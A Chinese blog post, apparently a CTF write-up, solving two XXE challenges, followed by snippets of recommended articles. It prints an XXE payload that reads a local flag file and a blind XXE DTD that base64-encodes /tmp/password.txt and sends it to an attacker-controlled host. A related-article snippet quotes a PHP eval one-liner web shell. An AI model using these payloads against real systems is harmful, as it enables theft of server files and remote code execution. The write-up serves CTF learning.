Htlab_Weekly_Ctf_13&14

最新推荐文章于 2024-05-28 16:22:37 发布
最新推荐文章于 2024-05-28 16:22:37 发布
阅读量321 收藏
点赞数 1
分类专栏: htlab-weekly-ctf 文章标签: xxe xml注入 blind xxe ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45628145/article/details/107596891
版权

simplexxe

一个简单的xml注入题,源码提示说flag在/opt/flag.txt里面,读一下即可得到flag

payload

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE note [
  <!ENTITY a SYSTEM "file:///opt/flag.txt">
]>
<user><username>&a;</username><password>a</password></user>

blind xxe

源码发现提示

根据题目名字知道这是个无回显的xxe,因为这题没有回显,是blind xxe,所以我们需要构建一条带外信道提取数据,因此我们需要开启一下本地的阿帕奇服务,通过这个外信道把数据传给我们攻击者的服务器并且引用我们的dtd文件

构造的payload如下

写一个dtd文件,目录如图放在www/html的根目录下,内容为

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///tmp/password.txt">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://10.1.1.100:1221/?%file;'>">

bp里面发送的为

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note[
  <!ENTITY % remote SYSTEM "http://10.1.1.100/1.dtd">
  %remote;
  %all;
  %send;
]>

然后本地用nc对我们的1221端口进行监听,来监听从服务器端发过来的请求,对文件内容base64解码得到flag

这里为什么要用php的伪协议来读取数据呢,开始没有用伪协议,并没有读出来,这是因为通过参数实体引用获取到的数据,并不会进行urlencode,并且解析器对URL有一定限制,只要有回车换行(测试发现php中空格、等制表符也不允许),都会被检查为不合法URL,直接拦截这个请求,所以需要用php的伪协议来进行读取。
blind xxe 参考链接

秋风瑟瑟...
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
定义python函数时、如果函数中没有return_python中函数的定义、返回值以及参数的简要介绍...
weixin_39850787的博客
11-24 3167
一、1.函数定义:def关键字开头,空格之后接函数名称和圆括号(),后面紧跟‘:”。函数是对功能的封装语法:def 函数名(形参列表):函数体(代码块,return)调用:函数名(实参列表)#函数定义defmylen():"""计算s1的长度"""s1= "hello world"length=0for i ins1:length= length+1print(length)#函数调用mylen(...
【BUUCTF之easy_tornado】
qq_40646572的博客
05-15 894
打开题目网站,发现存在三个文件,都打开看了下,在hint.txt文件中发现提示。 在flag.txt文件中也有提示flag在/fllllllllllllag文件中。 整理下思路,这道题其实关键点在于hint.txt文件中的cookie_secret值。 但考虑到题目名中包含tornado这个关键词,百度下发现这是一个python的web框架,搜索下是否存在可以读取配置文件的漏洞,发现这个框架存在可以读取配置文件的漏洞。 想到还有一个welcome.txt文件,上面提示到render,渲染。想到ss..
ctfhub技能树RCE部分(待完善)
qq_39670065的博客
11-09 576
eval执行 eval执行就是远程代码执行 看看代码 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 连上蚁剑 连上会发现这是一个Linux系统,要使用简单的Linux命令 ls 列出目录中的文件 cd 选择要进入的目录 cd / 返回到根目录 cat 查看文件 更多命令见linux常用命令学习 再次温馨提示:学习.
BUUCTF-WEB3
最新发布
lin__ying的博客
05-28 278
一句话木马eval($_POST["Syc"]);
ctf.show_36D杯_web_给你shell
qq_45628145的博客
05-22 1638
ctf.show_36D杯_web_给你shell 进入题目,f12,有个链接view_source,还有个提示说flag在flag.txt里面,访问得到源码,下面是源码及分析 <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset($_GET['view_source'])) {
Sales_TransactionsDatasetWeekly数据挖掘
02-28
在本项目中,"Sales_TransactionsDatasetWeekly" 是一个用于数据挖掘的数据集,它记录了一周内的销售交易数据。这个数据集通常包含了丰富的信息,如产品ID、销售日期、交易金额、客户信息等,可用于分析销售趋势、...
discovery_weekly_api
03-22
"discovery_weekly_api"是一个基于JavaScript开发的API服务,旨在提供周期性的数据发现和更新功能,可能是为了帮助用户获取最新、最热门的信息或者行业内动态。这个API可能用于订阅和接收特定领域的周报,比如技术...
uber_Rides_Weekly
04-05
标题“uber_Rides_Weekly”很可能指的是一个与Uber公司每周乘车数据相关的项目或者分析。Uber是一家全球知名的共享出行服务提供商,其业务数据包括乘客的行程、费用、时间等多个方面。这个项目的重点可能在于分析...
cpp_weekly_game_project
03-12
【cpp_weekly_game_project】是一个基于C++语言的每周游戏项目,旨在提升开发者在C++编程、游戏开发以及算法设计上的技能。通过参与这样的项目,开发者可以深化对C++特性和标准库的理解,同时锻炼实际工程项目的开发...
KENNEDY_6_weekly_exercises
03-04
标题“KENNEDY_6_weekly_exercises”暗示了这是一个关于编程练习或者课程作业的集合,可能由用户KENNEDY在六周的时间里完成。这个项目主要与R语言相关,因为标签指明了“R”。R是一种广泛用于统计分析、图形绘制以及...
网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag
yellowO的博客
12-27 4448
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。利用该插件可能存在的漏洞。pwd查看当前所在的目录,cd切换到/var/www/html目录下,ls查看当前目录下的内容,找到wp-config.php文件。
CTF实验:web安全命令执行
floyd_art的博客
04-12 1525
命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。   调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。 信息探测 ...
文件上传相关题目
m0_73952121的博客
10-21 1025
简单的文件上传题目
EIS 2018 部分web writeup
Kr的博客
11-20 556
打过这么多比赛,好像还是没有进入过比赛的状态,肯定是太菜了,虽然没做出来,也记一下,权当学习一下这些思路。 web: SimpleBBS 这个题是登录框的一个报错注入,很简单的一个题,但是没想到 如果在登陆框中输入单引号,数据库就会报错,所以是一个报错注入 然后burp抓包 使用updatexml语句进行报错注入 payload: username=admin' and ...
CTF-[XXE学习记录]
qq_53142368的博客
06-07 1002
1.XXE 关于xml我就不详细说了,想看的话从我之前的文章找找,有关于xml的概念和怎么构造。 XML的设计宗旨是传输数据,而非显示数据。XML是不作为的,XML是不会做任何事情,XML 被设计用来结构化、存储以及传输信息。 XML是纯文本,且允许创作者定义自己的标签和文档结构,是独立于软件和硬件的信息传输工具。 0x01.DTD 文档类型定义(DTD)可定义合法的XML文档构建模块,DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 1.内部的DOCTYPE声明 假如DTD被包含在XML
攻防世界web新手区共12题做题记录
Goodric的博客
12-04 639
第一题 view_source 题目要求查看网页源代码 按键盘F12查看源代码,可以发现flag。 第二题 robots 题目描述关于robots协议。 先了解一下什么是robots协议。 robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件。 Robots协议用来告知搜索引擎哪些页面能被抓取,哪些页面不能被抓取; 可以屏蔽一些网站中比较大的文件,如:图片,音乐,视频等,节省服务器带宽; 可以屏蔽站点的一些死链接。 先按F12查看源代码试试,显示fla
<总结>CTF·图片隐写
热门推荐
qq_57061511的博客
06-19 2万+
<前言:图片隐写作为CTF misc中的一类题目,由名可知,就是在各种不同类型的图片中找flag。图片类型不同,有时题目思路也会不同.> 一.入门级别的图片隐写题就是z
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。
m0_67844671的博客
10-01 2045
【sql注入】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件,读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
这里是什么格式"process_pattern": "{\"%Y%m%d_YMT_Profile_Weekly.csv\":[\"medlive_profile/\"],\"%Y%m%d_YMT_Behavior_Weekly.csv\":[\"medlive_behavior/\"], \"%Y%m%d_YMT_Content_Weekly.csv\":[\"medlive_content/\"], \"%Y%m%d_YXJ_NVS_NXJC_YTD_Weekly.xlsx\":[\"yixuejie_medworld_crm_weekly_profile/\",\"yixuejie_medworld_crm_weekly_content/\",\"yixuejie_medworld_crm_weekly_behavior/\"], \"%Y%m%d_YXJ_NVS_Rest_YTD_Monthly.xlsx\":[\"yixuejie_medworld_rest_monthly_behavior_unconsent/\",\"yixuejie_medworld_rest_monthly_behavior/\",\"yixuejie_medworld_rest_monthly_content/\", \"yixuejie_medworld_rest_monthly_wechat_publish_data/\", \"yixuejie_medworld_rest_monthly_profile_unconsent/\", \"yixuejie_medworld_rest_monthly_profile/\"]}"
06-14
每个键值对的键都是一个字符串,用于匹配文件名的格式,例如 "%Y%m%d_YMT_Profile_Weekly.csv" 表示匹配的文件名格式为 "20220101_YMT_Profile_Weekly.csv",其中 "%Y" 表示年份,"%m" 表示月份,"%d" 表示日期。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值